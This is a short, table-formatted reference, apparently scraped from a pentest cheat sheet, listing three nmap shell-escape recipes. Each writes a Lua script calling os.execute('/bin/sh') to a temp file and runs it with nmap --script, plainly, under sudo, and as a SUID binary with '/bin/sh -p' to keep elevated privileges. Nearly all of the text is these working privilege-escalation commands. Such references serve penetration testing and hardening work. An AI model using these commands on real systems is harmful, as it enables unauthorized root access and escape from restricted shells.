| description |
code |
| Echoing of input characters is disabled. |
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF
|
|
|
| description |
code |
| Echoing of input characters is disabled. |
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
|
|
|
| description |
code |
| Echoing of input characters is disabled. |
TF=$(mktemp)
echo 'os.execute("/bin/sh -p")' > $TF
./nmap --script=$TF
|
|
|